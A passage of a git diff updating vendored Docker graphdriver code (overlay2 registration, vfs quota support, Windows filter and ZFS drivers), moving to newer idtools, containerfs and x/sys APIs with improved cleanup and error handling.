-	_ "github.com/docker/docker/daemon/graphdriver/overlay2"
 )
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_overlay2.go b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_overlay2.go
new file mode 100644
index 0000000000..bcd2cee20e
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_overlay2.go
@@ -0,0 +1,8 @@
+// +build !exclude_graphdriver_overlay2,linux
+
+package register // import "github.com/docker/docker/daemon/graphdriver/register"
+
+import (
+	// register the overlay2 graphdriver
+	_ "github.com/docker/docker/daemon/graphdriver/overlay2"
+)
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_vfs.go b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_vfs.go
index 98fad23b20..26f33a21ba 100644
--- a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_vfs.go
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_vfs.go
@@ -1,4 +1,4 @@
-package register
+package register // import "github.com/docker/docker/daemon/graphdriver/register"
 
 import (
 	// register vfs
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_windows.go b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_windows.go
index efaa5005ed..cd612cbea9 100644
--- a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_windows.go
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_windows.go
@@ -1,6 +1,7 @@
-package register
+package register // import "github.com/docker/docker/daemon/graphdriver/register"
 
 import (
-	// register the windows graph driver
+	// register the windows graph drivers
+	_ "github.com/docker/docker/daemon/graphdriver/lcow"
 	_ "github.com/docker/docker/daemon/graphdriver/windows"
 )
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_zfs.go b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_zfs.go
index 8f34e35537..b137ad25b7 100644
--- a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_zfs.go
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_zfs.go
@@ -1,6 +1,6 @@
-// +build !exclude_graphdriver_zfs,linux !exclude_graphdriver_zfs,freebsd, solaris
+// +build !exclude_graphdriver_zfs,linux !exclude_graphdriver_zfs,freebsd
 
-package register
+package register // import "github.com/docker/docker/daemon/graphdriver/register"
 
 import (
 	// register the zfs driver
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/vfs/copy_linux.go b/vendor/github.com/docker/docker/daemon/graphdriver/vfs/copy_linux.go
new file mode 100644
index 0000000000..7276b3837f
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/vfs/copy_linux.go
@@ -0,0 +1,7 @@
+package vfs // import "github.com/docker/docker/daemon/graphdriver/vfs"
+
+import "github.com/docker/docker/daemon/graphdriver/copy"
+
+func dirCopy(srcDir, dstDir string) error {
+	return copy.DirCopy(srcDir, dstDir, copy.Content, false)
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/vfs/copy_unsupported.go b/vendor/github.com/docker/docker/daemon/graphdriver/vfs/copy_unsupported.go
new file mode 100644
index 0000000000..894ff02f02
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/vfs/copy_unsupported.go
@@ -0,0 +1,9 @@
+// +build !linux
+
+package vfs // import "github.com/docker/docker/daemon/graphdriver/vfs"
+
+import "github.com/docker/docker/pkg/chrootarchive"
+
+func dirCopy(srcDir, dstDir string) error {
+	return chrootarchive.NewArchiver(nil).CopyWithTar(srcDir, dstDir)
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/vfs/driver.go b/vendor/github.com/docker/docker/daemon/graphdriver/vfs/driver.go
index 8832d11531..e51cb6c250 100644
--- a/vendor/github.com/docker/docker/daemon/graphdriver/vfs/driver.go
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/vfs/driver.go
@@ -1,4 +1,4 @@
-package vfs
+package vfs // import "github.com/docker/docker/daemon/graphdriver/vfs"
 
 import (
 	"fmt"
@@ -6,15 +6,17 @@ import (
 	"path/filepath"
 
 	"github.com/docker/docker/daemon/graphdriver"
-	"github.com/docker/docker/pkg/chrootarchive"
+	"github.com/docker/docker/daemon/graphdriver/quota"
+	"github.com/docker/docker/pkg/containerfs"
 	"github.com/docker/docker/pkg/idtools"
-
-	"github.com/opencontainers/runc/libcontainer/label"
+	"github.com/docker/docker/pkg/system"
+	"github.com/docker/go-units"
+	"github.com/opencontainers/selinux/go-selinux/label"
 )
 
 var (
-	// CopyWithTar defines the copy method to use.
-	CopyWithTar = chrootarchive.CopyWithTar
+	// CopyDir defines the copy method to use.
+	CopyDir = dirCopy
 )
 
 func init() {
@@ -25,17 +27,16 @@ func init() {
 // This sets the home directory for the driver and returns NaiveDiffDriver.
 func Init(home string, options []string, uidMaps, gidMaps []idtools.IDMap) (graphdriver.Driver, error) {
 	d := &Driver{
-		home:    home,
-		uidMaps: uidMaps,
-		gidMaps: gidMaps,
-	}
-	rootUID, rootGID, err := idtools.GetRootUIDGID(uidMaps, gidMaps)
-	if err != nil {
-		return nil, err
+		home:       home,
+		idMappings: idtools.NewIDMappingsFromMaps(uidMaps, gidMaps),
 	}
-	if err := idtools.MkdirAllAs(home, 0700, rootUID, rootGID); err != nil {
+	rootIDs := d.idMappings.RootPair()
+	if err := idtools.MkdirAllAndChown(home, 0700, rootIDs); err != nil {
 		return nil, err
 	}
+
+	setupDriverQuota(d)
+
 	return graphdriver.NewNaiveDiffDriver(d, uidMaps, gidMaps), nil
 }
 
@@ -44,9 +45,9 @@ func Init(home string, options []string, uidMaps, gidMaps []idtools.IDMap) (grap
 // In order to support layering, files are copied from the parent layer into the new layer. There is no copy-on-write support.
 // Driver must be wrapped in NaiveDiffDriver to be used as a graphdriver.Driver
 type Driver struct {
-	home    string
-	uidMaps []idtools.IDMap
-	gidMaps []idtools.IDMap
+	driverQuota
+	home       string
+	idMappings *idtools.IDMappings
 }
 
 func (d *Driver) String() string {
@@ -71,26 +72,53 @@ func (d *Driver) Cleanup() error {
 // CreateReadWrite creates a layer that is writable for use as a container
 // file system.
 func (d *Driver) CreateReadWrite(id, parent string, opts *graphdriver.CreateOpts) error {
-	return d.Create(id, parent, opts)
+	var err error
+	var size int64
+
+	if opts != nil {
+		for key, val := range opts.StorageOpt {
+			switch key {
+			case "size":
+				if !d.quotaSupported() {
+					return quota.ErrQuotaNotSupported
+				}
+				if size, err = units.RAMInBytes(val); err != nil {
+					return err
+				}
+			default:
+				return fmt.Errorf("Storage opt %s not supported", key)
+			}
+		}
+	}
+
+	return d.create(id, parent, uint64(size))
 }
 
 // Create prepares the filesystem for the VFS driver and copies the directory for the given id under the parent.
 func (d *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) error {
 	if opts != nil && len(opts.StorageOpt) != 0 {
-		return fmt.Errorf("--storage-opt is not supported for vfs")
+		return fmt.Errorf("--storage-opt is not supported for vfs on read-only layers")
 	}
 
+	return d.create(id, parent, 0)
+}
+
+func (d *Driver) create(id, parent string, size uint64) error {
 	dir := d.dir(id)
-	rootUID, rootGID, err := idtools.GetRootUIDGID(d.uidMaps, d.gidMaps)
-	if err != nil {
+	rootIDs := d.idMappings.RootPair()
+	if err := idtools.MkdirAllAndChown(filepath.Dir(dir), 0700, rootIDs); err != nil {
 		return err
 	}
-	if err := idtools.MkdirAllAs(filepath.Dir(dir), 0700, rootUID, rootGID); err != nil {
+	if err := idtools.MkdirAndChown(dir, 0755, rootIDs); err != nil {
 		return err
 	}
-	if err := idtools.MkdirAs(dir, 0755, rootUID, rootGID); err != nil {
-		return err
+
+	if size != 0 {
+		if err := d.setupQuota(dir, size); err != nil {
+			return err
+		}
 	}
+
 	labelOpts := []string{"level:s0"}
 	if _, mountLabel, err := label.InitLabels(labelOpts); err == nil {
 		label.SetFileLabel(dir, mountLabel)
@@ -102,10 +130,7 @@ func (d *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) error {
 	if err != nil {
 		return fmt.Errorf("%s: %s", parent, err)
 	}
-	if err := CopyWithTar(parentDir, dir); err != nil {
-		return err
-	}
-	return nil
+	return CopyDir(parentDir.Path(), dir)
 }
 
 func (d *Driver) dir(id string) string {
@@ -114,21 +139,18 @@ func (d *Driver) dir(id string) string {
 
 // Remove deletes the content from the directory for a given id.
 func (d *Driver) Remove(id string) error {
-	if err := os.RemoveAll(d.dir(id)); err != nil && !os.IsNotExist(err) {
-		return err
-	}
-	return nil
+	return system.EnsureRemoveAll(d.dir(id))
 }
 
 // Get returns the directory for the given id.
-func (d *Driver) Get(id, mountLabel string) (string, error) {
+func (d *Driver) Get(id, mountLabel string) (containerfs.ContainerFS, error) {
 	dir := d.dir(id)
 	if st, err := os.Stat(dir); err != nil {
-		return "", err
+		return nil, err
 	} else if !st.IsDir() {
-		return "", fmt.Errorf("%s: not a directory", dir)
+		return nil, fmt.Errorf("%s: not a directory", dir)
 	}
-	return dir, nil
+	return containerfs.NewLocalContainerFS(dir), nil
 }
 
 // Put is a noop for vfs that return nil for the error, since this driver has no runtime resources to clean up.
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/vfs/quota_linux.go b/vendor/github.com/docker/docker/daemon/graphdriver/vfs/quota_linux.go
new file mode 100644
index 0000000000..0d5c3a7b98
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/vfs/quota_linux.go
@@ -0,0 +1,26 @@
+package vfs // import "github.com/docker/docker/daemon/graphdriver/vfs"
+
+import (
+	"github.com/docker/docker/daemon/graphdriver/quota"
+	"github.com/sirupsen/logrus"
+)
+
+type driverQuota struct {
+	quotaCtl *quota.Control
+}
+
+func setupDriverQuota(driver *Driver) {
+	if quotaCtl, err := quota.NewControl(driver.home); err == nil {
+		driver.quotaCtl = quotaCtl
+	} else if err != quota.ErrQuotaNotSupported {
+		logrus.Warnf("Unable to setup quota: %v\n", err)
+	}
+}
+
+func (d *Driver) setupQuota(dir string, size uint64) error {
+	return d.quotaCtl.SetQuota(dir, quota.Quota{Size: size})
+}
+
+func (d *Driver) quotaSupported() bool {
+	return d.quotaCtl != nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/vfs/quota_unsupported.go b/vendor/github.com/docker/docker/daemon/graphdriver/vfs/quota_unsupported.go
new file mode 100644
index 0000000000..3ae60ac07c
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/vfs/quota_unsupported.go
@@ -0,0 +1,20 @@
+// +build !linux
+
+package vfs // import "github.com/docker/docker/daemon/graphdriver/vfs"
+
+import "github.com/docker/docker/daemon/graphdriver/quota"
+
+type driverQuota struct {
+}
+
+func setupDriverQuota(driver *Driver) error {
+	return nil
+}
+
+func (d *Driver) setupQuota(dir string, size uint64) error {
+	return quota.ErrQuotaNotSupported
+}
+
+func (d *Driver) quotaSupported() bool {
+	return false
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/vfs/vfs_test.go b/vendor/github.com/docker/docker/daemon/graphdriver/vfs/vfs_test.go
index 9ecf21dbaa..7c59ec32e2 100644
--- a/vendor/github.com/docker/docker/daemon/graphdriver/vfs/vfs_test.go
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/vfs/vfs_test.go
@@ -1,6 +1,6 @@
 // +build linux
 
-package vfs
+package vfs // import "github.com/docker/docker/daemon/graphdriver/vfs"
 
 import (
 	"testing"
@@ -32,6 +32,10 @@ func TestVfsCreateSnap(t *testing.T) {
 	graphtest.DriverTestCreateSnap(t, "vfs")
 }
 
+func TestVfsSetQuota(t *testing.T) {
+	graphtest.DriverTestSetQuota(t, "vfs", false)
+}
+
 func TestVfsTeardown(t *testing.T) {
 	graphtest.PutDriver(t)
 }
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/windows/windows.go b/vendor/github.com/docker/docker/daemon/graphdriver/windows/windows.go
index beac93ae75..16a5229206 100644
--- a/vendor/github.com/docker/docker/daemon/graphdriver/windows/windows.go
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/windows/windows.go
@@ -1,6 +1,6 @@
 //+build windows
 
-package windows
+package windows // import "github.com/docker/docker/daemon/graphdriver/windows"
 
 import (
 	"bufio"
@@ -24,14 +24,16 @@ import (
 	"github.com/Microsoft/go-winio/archive/tar"
 	"github.com/Microsoft/go-winio/backuptar"
 	"github.com/Microsoft/hcsshim"
-	"github.com/Sirupsen/logrus"
 	"github.com/docker/docker/daemon/graphdriver"
 	"github.com/docker/docker/pkg/archive"
+	"github.com/docker/docker/pkg/containerfs"
 	"github.com/docker/docker/pkg/idtools"
 	"github.com/docker/docker/pkg/ioutils"
 	"github.com/docker/docker/pkg/longpath"
 	"github.com/docker/docker/pkg/reexec"
+	"github.com/docker/docker/pkg/system"
 	units "github.com/docker/go-units"
+	"github.com/sirupsen/logrus"
 	"golang.org/x/sys/windows"
 )
 
@@ -93,6 +95,10 @@ func InitFilter(home string, options []string, uidMaps, gidMaps []idtools.IDMap)
 		return nil, fmt.Errorf("%s is on an ReFS volume - ReFS volumes are not supported", home)
 	}
 
+	if err := idtools.MkdirAllAndChown(home, 0700, idtools.IDPair{UID: 0, GID: 0}); err != nil {
+		return nil, fmt.Errorf("windowsfilter failed to create '%s': %v", home, err)
+	}
+
 	d := &Driver{
 		info: hcsshim.DriverInfo{
 			HomeDir: home,
@@ -119,7 +125,7 @@ func getFileSystemType(drive string) (fsType string, hr error) {
 		modkernel32              = windows.NewLazySystemDLL("kernel32.dll")
 		procGetVolumeInformation = modkernel32.NewProc("GetVolumeInformationW")
 		buf                      = make([]uint16, 255)
-		size                     = syscall.MAX_PATH + 1
+		size                     = windows.MAX_PATH + 1
 	)
 	if len(drive) != 1 {
 		hr = errors.New("getFileSystemType must be called with a drive letter")
@@ -127,11 +133,11 @@ func getFileSystemType(drive string) (fsType string, hr error) {
 	}
 	drive += `:\`
 	n := uintptr(unsafe.Pointer(nil))
-	r0, _, _ := syscall.Syscall9(procGetVolumeInformation.Addr(), 8, uintptr(unsafe.Pointer(syscall.StringToUTF16Ptr(drive))), n, n, n, n, n, uintptr(unsafe.Pointer(&buf[0])), uintptr(size), 0)
+	r0, _, _ := syscall.Syscall9(procGetVolumeInformation.Addr(), 8, uintptr(unsafe.Pointer(windows.StringToUTF16Ptr(drive))), n, n, n, n, n, uintptr(unsafe.Pointer(&buf[0])), uintptr(size), 0)
 	if int32(r0) < 0 {
 		hr = syscall.Errno(win32FromHresult(r0))
 	}
-	fsType = syscall.UTF16ToString(buf)
+	fsType = windows.UTF16ToString(buf)
 	return
 }
 
@@ -265,19 +271,35 @@ func (d *Driver) Remove(id string) error {
 	// it is a transient error. Retry until it succeeds.
 	var computeSystems []hcsshim.ContainerProperties
 	retryCount := 0
+	osv := system.GetOSVersion()
 	for {
-		// Get and terminate any template VMs that are currently using the layer
+		// Get and terminate any template VMs that are currently using the layer.
+		// Note: It is unfortunate that we end up in the graphdrivers Remove() call
+		// for both containers and images, but the logic for template VMs is only
+		// needed for images - specifically we are looking to see if a base layer
+		// is in use by a template VM as a result of having started a Hyper-V
+		// container at some point.
+		//
+		// We have a retry loop for ErrVmcomputeOperationInvalidState and
+		// ErrVmcomputeOperationAccessIsDenied as there is a race condition
+		// in RS1 and RS2 building during enumeration when a silo is going away
+		// for example under it, in HCS. AccessIsDenied added to fix 30278.
+		//
+		// TODO @jhowardmsft - For RS3, we can remove the retries. Also consider
+		// using platform APIs (if available) to get this more succinctly. Also
+		// consider enhancing the Remove() interface to have context of why
+		// the remove is being called - that could improve efficiency by not
+		// enumerating compute systems during a remove of a container as it's
+		// not required.
 		computeSystems, err = hcsshim.GetContainers(hcsshim.ComputeSystemQuery{})
 		if err != nil {
-			if err == hcsshim.ErrVmcomputeOperationInvalidState {
-				if retryCount >= 5 {
-					// If we are unable to get the list of containers
-					// go ahead and attempt to delete the layer anyway
-					// as it will most likely work.
+			if (osv.Build < 15139) &&
+				((err == hcsshim.ErrVmcomputeOperationInvalidState) || (err == hcsshim.ErrVmcomputeOperationAccessIsDenied)) {
+				if retryCount >= 500 {
 					break
 				}
 				retryCount++
-				time.Sleep(2 * time.Second)
+				time.Sleep(10 * time.Millisecond)
 				continue
 			}
 			return err
@@ -318,45 +340,53 @@ func (d *Driver) Remove(id string) error {
 	return nil
 }
 
+// GetLayerPath gets the layer path on host
+func (d *Driver) GetLayerPath(id string) (string, error) {
+	return d.dir(id), nil
+}
+
 // Get returns the rootfs path for the id. This will mount the dir at its given path.
-func (d *Driver) Get(id, mountLabel string) (string, error) {
+func (d *Driver) Get(id, mountLabel string) (containerfs.ContainerFS, error) {
 	logrus.Debugf("WindowsGraphDriver Get() id %s mountLabel %s", id, mountLabel)
 	var dir string
 
 	rID, err := d.resolveID(id)
 	if err != nil {
-		return "", err
+		return nil, err
 	}
 	if count := d.ctr.Increment(rID); count > 1 {
-		return d.cache[rID], nil
+		return containerfs.NewLocalContainerFS(d.cache[rID]), nil
 	}
 
 	// Getting the layer paths must be done outside of the lock.
 	layerChain, err := d.getLayerChain(rID)
 	if err != nil {
 		d.ctr.Decrement(rID)
-		return "", err
+		return nil, err
 	}
 
 	if err := hcsshim.ActivateLayer(d.info, rID); err != nil {
 		d.ctr.Decrement(rID)
-		return "", err
+		return nil, err
 	}
 	if err := hcsshim.PrepareLayer(d.info, rID, layerChain); err != nil {
 		d.ctr.Decrement(rID)
 		if err2 := hcsshim.DeactivateLayer(d.info, rID); err2 != nil {
 			logrus.Warnf("Failed to Deactivate %s: %s", id, err)
 		}
-		return "", err
+		return nil, err
 	}
 
 	mountPath, err := hcsshim.GetLayerMountPath(d.info, rID)
 	if err != nil {
 		d.ctr.Decrement(rID)
+		if err := hcsshim.UnprepareLayer(d.info, rID); err != nil {
+			logrus.Warnf("Failed to Unprepare %s: %s", id, err)
+		}
 		if err2 := hcsshim.DeactivateLayer(d.info, rID); err2 != nil {
 			logrus.Warnf("Failed to Deactivate %s: %s", id, err)
 		}
-		return "", err
+		return nil, err
 	}
 	d.cacheMu.Lock()
 	d.cache[rID] = mountPath
@@ -370,7 +400,7 @@ func (d *Driver) Get(id, mountLabel string) (string, error) {
 		dir = d.dir(id)
 	}
 
-	return dir, nil
+	return containerfs.NewLocalContainerFS(dir), nil
 }
 
 // Put adds a new layer to the driver.
@@ -385,9 +415,15 @@ func (d *Driver) Put(id string) error {
 		return nil
 	}
 	d.cacheMu.Lock()
+	_, exists := d.cache[rID]
 	delete(d.cache, rID)
 	d.cacheMu.Unlock()
 
+	// If the cache was not populated, then the layer was left unprepared and deactivated
+	if !exists {
+		return nil
+	}
+
 	if err := hcsshim.UnprepareLayer(d.info, rID); err != nil {
 		return err
 	}
@@ -395,7 +431,31 @@ func (d *Driver) Put(id string) error {
 }
 
 // Cleanup ensures the information the driver stores is properly removed.
+// We use this opportunity to cleanup any -removing folders which may be
+// still left if the daemon was killed while it was removing a layer.
 func (d *Driver) Cleanup() error {
+	items, err := ioutil.ReadDir(d.info.HomeDir)
+	if err != nil {
+		if os.IsNotExist(err) {
+			return nil
+		}
+		return err
+	}
+
+	// Note we don't return an error below - it's possible the files
+	// are locked. However, next time around after the daemon exits,
+	// we likely will be able to to cleanup successfully. Instead we log
+	// warnings if there are errors.
+	for _, item := range items {
+		if item.IsDir() && strings.HasSuffix(item.Name(), "-removing") {
+			if err := hcsshim.DestroyLayer(d.info, item.Name()); err != nil {
+				logrus.Warnf("Failed to cleanup %s: %s", item.Name(), err)
+			} else {
+				logrus.Infof("Cleaned up %s", item.Name())
+			}
+		}
+	}
+
 	return nil
 }
 
@@ -544,7 +604,7 @@ func (d *Driver) DiffSize(id, parent string) (size int64, err error) {
 	}
 	defer d.Put(id)
 
-	return archive.ChangesSize(layerFs, changes), nil
+	return archive.ChangesSize(layerFs.Path(), changes), nil
 }
 
 // GetMetadata returns custom driver information.
@@ -724,7 +784,7 @@ func writeLayerReexec() {
 }
 
 // writeLayer writes a layer from a tar file.
-func writeLayer(layerData io.Reader, home string, id string, parentLayerPaths ...string) (int64, error) {
+func writeLayer(layerData io.Reader, home string, id string, parentLayerPaths ...string) (size int64, retErr error) {
 	err := winio.EnableProcessPrivileges([]string{winio.SeBackupPrivilege, winio.SeRestorePrivilege})
 	if err != nil {
 		return 0, err
@@ -749,17 +809,17 @@ func writeLayer(layerData io.Reader, home string, id string, parentLayerPaths ..
 		return 0, err
 	}
 
-	size, err := writeLayerFromTar(layerData, w, filepath.Join(home, id))
-	if err != nil {
-		return 0, err
-	}
-
-	err = w.Close()
-	if err != nil {
-		return 0, err
-	}
+	defer func() {
+		if err := w.Close(); err != nil {
+			// This error should not be discarded as a failure here
+			// could result in an invalid layer on disk
+			if retErr == nil {
+				retErr = err
+			}
+		}
+	}()
 
-	return size, nil
+	return writeLayerFromTar(layerData, w, filepath.Join(home, id))
 }
 
 // resolveID computes the layerID information based on the given id.
@@ -775,11 +835,7 @@ func (d *Driver) resolveID(id string) (string, error) {
 
 // setID stores the layerId in disk.
 func (d *Driver) setID(id, altID string) error {
-	err := ioutil.WriteFile(filepath.Join(d.dir(id), "layerId"), []byte(altID), 0600)
-	if err != nil {
-		return err
-	}
-	return nil
+	return ioutil.WriteFile(filepath.Join(d.dir(id), "layerId"), []byte(altID), 0600)
 }
 
 // getLayerChain returns the layer chain information.
@@ -829,14 +885,16 @@ func (fg *fileGetCloserWithBackupPrivileges) Get(filename string) (io.ReadCloser
 	var f *os.File
 	// Open the file while holding the Windows backup privilege. This ensures that the
 	// file can be opened even if the caller does not actually have access to it according
-	// to the security descriptor.
+	// to the security descriptor. Also use sequential file access to avoid depleting the
+	// standby list - Microsoft VSO Bug Tracker #9900466
 	err := winio.RunWithPrivilege(winio.SeBackupPrivilege, func() error {
 		path := longpath.AddPrefix(filepath.Join(fg.path, filename))
-		p, err := syscall.UTF16FromString(path)
+		p, err := windows.UTF16FromString(path)
 		if err != nil {
 			return err
 		}
-		h, err := syscall.CreateFile(&p[0], syscall.GENERIC_READ, syscall.FILE_SHARE_READ, nil, syscall.OPEN_EXISTING, syscall.FILE_FLAG_BACKUP_SEMANTICS, 0)
+		const fileFlagSequentialScan = 0x08000000 // FILE_FLAG_SEQUENTIAL_SCAN
+		h, err := windows.CreateFile(&p[0], windows.GENERIC_READ, windows.FILE_SHARE_READ, nil, windows.OPEN_EXISTING, windows.FILE_FLAG_BACKUP_SEMANTICS|fileFlagSequentialScan, 0)
 		if err != nil {
 			return &os.PathError{Op: "open", Path: path, Err: err}
 		}
@@ -878,8 +936,6 @@ func parseStorageOpt(storageOpt map[string]string) (*storageOptions, error) {
 				return nil, err
 			}
 			options.size = uint64(size)
-		default:
-			return nil, fmt.Errorf("Unknown storage option: %s", key)
 		}
 	}
 	return &options, nil
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs.go b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs.go
index 8e283ccf40..1d9153e171 100644
--- a/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs.go
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs.go
@@ -1,6 +1,6 @@
-// +build linux freebsd solaris
+// +build linux freebsd
 
-package zfs
+package zfs // import "github.com/docker/docker/daemon/graphdriver/zfs"
 
 import (
 	"fmt"
@@ -10,16 +10,17 @@ import (
 	"strconv"
 	"strings"
 	"sync"
-	"syscall"
 	"time"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/docker/docker/daemon/graphdriver"
+	"github.com/docker/docker/pkg/containerfs"
 	"github.com/docker/docker/pkg/idtools"
 	"github.com/docker/docker/pkg/mount"
 	"github.com/docker/docker/pkg/parsers"
-	zfs "github.com/mistifyio/go-zfs"
-	"github.com/opencontainers/runc/libcontainer/label"
+	"github.com/mistifyio/go-zfs"
+	"github.com/opencontainers/selinux/go-selinux/label"
+	"github.com/sirupsen/logrus"
+	"golang.org/x/sys/unix"
 )
 
 type zfsOptions struct {
@@ -36,7 +37,7 @@ type Logger struct{}
 
 // Log wraps log message from ZFS driver with a prefix '[zfs]'.
 func (*Logger) Log(cmd []string) {
-	logrus.Debugf("[zfs] %s", strings.Join(cmd, " "))
+	logrus.WithField("storage-driver", "zfs").Debugf("[zfs] %s", strings.Join(cmd, " "))
 }
 
 // Init returns a new ZFS driver.
@@ -45,14 +46,16 @@ func (*Logger) Log(cmd []string) {
 func Init(base string, opt []string, uidMaps, gidMaps []idtools.IDMap) (graphdriver.Driver, error) {
 	var err error
 
+	logger := logrus.WithField("storage-driver", "zfs")
+
 	if _, err := exec.LookPath("zfs"); err != nil {
-		logrus.Debugf("[zfs] zfs command is not available: %v", err)
+		logger.Debugf("zfs command is not available: %v", err)
 		return nil, graphdriver.ErrPrerequisites
 	}
 
 	file, err := os.OpenFile("/dev/zfs", os.O_RDWR, 600)
 	if err != nil {
-		logrus.Debugf("[zfs] cannot open /dev/zfs: %v", err)
+		logger.Debugf("cannot open /dev/zfs: %v", err)
 		return nil, graphdriver.ErrPrerequisites
 	}
 	defer file.Close()
@@ -103,13 +106,10 @@ func Init(base string, opt []string, uidMaps, gidMaps []idtools.IDMap) (graphdri
 	if err != nil {
 		return nil, fmt.Errorf("Failed to get root uid/guid: %v", err)
 	}
-	if err := idtools.MkdirAllAs(base, 0700, rootUID, rootGID); err != nil {
+	if err := idtools.MkdirAllAndChown(base, 0700, idtools.IDPair{UID: rootUID, GID: rootGID}); err != nil {
 		return nil, fmt.Errorf("Failed to create '%s': %v", base, err)
 	}
 
-	if err := mount.MakePrivate(base); err != nil {
-		return nil, err
-	}
 	d := &Driver{
 		dataset:          rootDataset,
 		options:          options,
@@ -141,19 +141,19 @@ func parseOptions(opt []string) (zfsOptions, error) {
 }
 
 func lookupZfsDataset(rootdir string) (string, error) {
-	var stat syscall.Stat_t
-	if err := syscall.Stat(rootdir, &stat); err != nil {
+	var stat unix.Stat_t
+	if err := unix.Stat(rootdir, &stat); err != nil {
 		return "", fmt.Errorf("Failed to access '%s': %s", rootdir, err)
 	}
 	wantedDev := stat.Dev
 
-	mounts, err := mount.GetMounts()
+	mounts, err := mount.GetMounts(nil)
 	if err != nil {
 		return "", err
 	}
 	for _, m := range mounts {
-		if err := syscall.Stat(m.Mountpoint, &stat); err != nil {
-			logrus.Debugf("[zfs] failed to stat '%s' while scanning for zfs mount: %v", m.Mountpoint, err)
+		if err := unix.Stat(m.Mountpoint, &stat); err != nil {
+			logrus.WithField("storage-driver", "zfs").Debugf("failed to stat '%s' while scanning for zfs mount: %v", m.Mountpoint, err)
 			continue // may fail on fuse file systems
 		}
 
@@ -180,7 +180,8 @@ func (d *Driver) String() string {
 	return "zfs"
 }
 
-// Cleanup is used to implement graphdriver.ProtoDriver. There is no cleanup required for this driver.
+// Cleanup is called on daemon shutdown, it is a no-op for ZFS.
+// TODO(@cpuguy83): Walk layer tree and check mounts?
 func (d *Driver) Cleanup() error {
 	return nil
 }
@@ -220,7 +221,10 @@ func (d *Driver) Status() [][2]string {
 
 // GetMetadata returns image/container metadata related to graph driver
 func (d *Driver) GetMetadata(id string) (map[string]string, error) {
-	return nil, nil
+	return map[string]string{
+		"Mountpoint": d.mountPath(id),
+		"Dataset":    d.zfsPath(id),
+	}, nil
 }
 
 func (d *Driver) cloneFilesystem(name, parentName string) error {
@@ -353,41 +357,49 @@ func (d *Driver) Remove(id string) error {
 }
 
 // Get returns the mountpoint for the given id after creating the target directories if necessary.
-func (d *Driver) Get(id, mountLabel string) (string, error) {
+func (d *Driver) Get(id, mountLabel string) (_ containerfs.ContainerFS, retErr error) {
 	mountpoint := d.mountPath(id)
 	if count := d.ctr.Increment(mountpoint); count > 1 {
-		return mountpoint, nil
-	}
+		return containerfs.NewLocalContainerFS(mountpoint), nil
+	}
+	defer func() {
+		if retErr != nil {
+			if c := d.ctr.Decrement(mountpoint); c <= 0 {
+				if mntErr := unix.Unmount(mountpoint, 0); mntErr != nil {
+					logrus.WithField("storage-driver", "zfs").Errorf("Error unmounting %v: %v", mountpoint, mntErr)
+				}
+				if rmErr := unix.Rmdir(mountpoint); rmErr != nil && !os.IsNotExist(rmErr) {
+					logrus.WithField("storage-driver", "zfs").Debugf("Failed to remove %s: %v", id, rmErr)
+				}
+
+			}
+		}
+	}()
 
 	filesystem := d.zfsPath(id)
 	options := label.FormatMountLabel("", mountLabel)
-	logrus.Debugf(`[zfs] mount("%s", "%s", "%s")`, filesystem, mountpoint, options)
+	logrus.WithField("storage-driver", "zfs").Debugf(`mount("%s", "%s", "%s")`, filesystem, mountpoint, options)
 
 	rootUID, rootGID, err := idtools.GetRootUIDGID(d.uidMaps, d.gidMaps)
 	if err != nil {
-		d.ctr.Decrement(mountpoint)
-		return "", err
+		return nil, err
 	}
 	// Create the target directories if they don't exist
-	if err := idtools.MkdirAllAs(mountpoint, 0755, rootUID, rootGID); err != nil {
-		d.ctr.Decrement(mountpoint)
-		return "", err
+	if err := idtools.MkdirAllAndChown(mountpoint, 0755, idtools.IDPair{UID: rootUID, GID: rootGID}); err != nil {
+		return nil, err
 	}
 
 	if err := mount.Mount(filesystem, mountpoint, "zfs", options); err != nil {
-		d.ctr.Decrement(mountpoint)
-		return "", fmt.Errorf("error creating zfs mount of %s to %s: %v", filesystem, mountpoint, err)
+		return nil, fmt.Errorf("error creating zfs mount of %s to %s: %v", filesystem, mountpoint, err)
 	}
 
 	// this could be our first mount after creation of the filesystem, and the root dir may still have root
 	// permissions instead of the remapped root uid:gid (if user namespaces are enabled):
 	if err := os.Chown(mountpoint, rootUID, rootGID); err != nil {
-		mount.Unmount(mountpoint)
-		d.ctr.Decrement(mountpoint)
-		return "", fmt.Errorf("error modifying zfs mountpoint (%s) directory ownership: %v", mountpoint, err)
+		return nil, fmt.Errorf("error modifying zfs mountpoint (%s) directory ownership: %v", mountpoint, err)
 	}
